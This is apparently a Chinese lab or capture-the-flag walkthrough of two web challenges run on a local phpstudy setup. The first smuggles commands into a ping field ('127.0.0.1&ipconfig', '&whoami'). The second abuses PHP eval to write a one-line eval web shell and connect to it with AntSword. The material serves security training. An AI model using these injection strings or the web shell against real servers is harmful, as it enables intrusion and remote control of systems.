第1关 exec "ping"

1.打开网站

看到一个ping的字样，想到这里应该是要写一个IP地址，这里用本地回环地址 

可以看到返回了，根据返回的TTL值，猜想到这里应该是Windows

使用命令可以观看之前写的博客。

所以直接写入127.0.0.1&ipconfig，直接出现IP地址

写入 127.0.0.1&whoami

当然，这里还可以执行其他Windows命令，这里就不再演示 

 第2关 exec "eval"

首先来搜索下这个函数

可以看到这个函数会把函数里的字符串作为函数执行

所以在输入框中输入phpinfo();

这里也可以写一个木马

输入payload：fwrite(fopen('shell.php','w'),'<?php eval($_POST[attack]);?>');

虽然返回的是这样

 

但是当我们打开phpstudy的目录

打开蚁剑，连接木马 

连接成功，添加数据

上传成功。